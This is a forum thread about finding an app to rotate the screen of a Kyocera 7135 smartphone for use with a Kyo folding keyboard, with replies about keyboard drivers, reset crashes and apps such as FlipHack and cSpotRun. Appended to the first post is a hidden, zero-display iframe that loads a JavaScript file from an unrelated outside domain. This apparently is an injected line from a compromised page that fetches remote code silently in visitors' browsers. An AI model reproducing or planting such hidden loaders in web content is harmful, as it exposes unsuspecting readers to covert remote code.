+ Reply to Thread

App to Rotate the Screen?

I just got the Kyo folding keyboard and find it works pretty well. I had tried the MicroInnovations IR keyboard, but could never get it to work right. The only drawback is the connecting cable and awkward position the phone is in when it is connected. What I would like is an app that flips the screen so I can put the 7135 on its side. I tried the driver that came with the Micro Innovations keyboard, but it conflicts. Does anyone know of a rotating screen app?

I did a search and found the same question on the 6035 board and the answer was no app out seemed to work. But that was about a year ago, so I want to find out if anyone knows of any developments.

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Registered User All-Purpose Guru's Avatar
    there's another thread here about keyboards, where apparently the 7135 is supported by the MicroInnovations keyboard. Even screen rotation is apparently working. (try the new driver, I think it's 1.6r

I've tried that driver, and while it doesn't seem to lock up the 6035 as much as the old driver did, it also doesn't rotate the screen either (it doesn't crash the system like the old one did, but it doesn't rotate either.)

So, for the 7135, you might find it works if you get the new driver.

--apg

Thanks for the reply. I did try the Micro Innovations keyboard with the new driver. For some reason (software conflict, I assume), it gives me the dreaded RSD. I just tried the driver again to see if I could just use it for the rotate capaibility, but I again got the RSD. Since I assume it is the driver for the MI keyboard that is causing the problem, what I am looking for is some app that just allows the rotating of the screen. That way I can use the Kyo keyboard with the 7135 on its side.

I think the correct acroynms is RCSoD or RCSD as it's color and not b&w.

Have you tried with no programs in it? (Best if you have two PCs or SD card to backup the good one before trying to install from clean hard-resetted state) I don't really think it's the drivers that causing it but other programs are conflicting it.

Originally posted by nl4jy
    I think the correct acroynms is RCSoD or RCSD as it's color and not b&w.

Have you tried with no programs in it? (Best if you have two PCs or SD card to backup the good one before trying to install from clean hard-resetted state) I don't really think it's the drivers that causing it but other programs are conflicting it.
    I thought about doing a hard reset and loading my apps back one by one to find the conflict, but decided it wasn't worth it. I actually like the Kyo keyboard better than the MI; all I want is the MI driver's ability to rotate the screen. Getting that is not worth the hassle of an app by app debug, especially since there are not a lot of apps I'm presently running I would be willing to give up for that ability. I did find FlipHack, but it doesn't work on the 7135. At least it did have the decency to not crash the 7135 with a RCSD.

The search continues.

The screen does rotate in cSpotRun, but that is just for reading ebooks. But it is fun to read an ebook with the phone horizontal, with the 7135's hinge like the spine of the book.
    ~'kito
    pdaPhoneHome Moderator

I saw a reference to cSpotRun when I did a search for Palm and rotate screen. Since cSpotRun and Micro Innovations can do it, I just need some enterprising developer to come up with a screen rotation app not connected to any other software. Oh, well, there is always something new coming along. Maybe I'll get lucky.

Originally posted by Lnoble
    I saw a reference to cSpotRun when I did a search for Palm and rotate screen. Since cSpotRun and Micro Innovations can do it, I just need some enterprising developer to come up with a screen rotation app not connected to any other software. Oh, well, there is always something new coming along. Maybe I'll get lucky.
    I think this would have to be a Hack and sit under/in the screen driver api. Probably wouldn't be too hard since the screen area is square. Rotating the grafiti area would be quite a different matter (shouldn't matter since you're looking to do this for keyboard use).

-Quick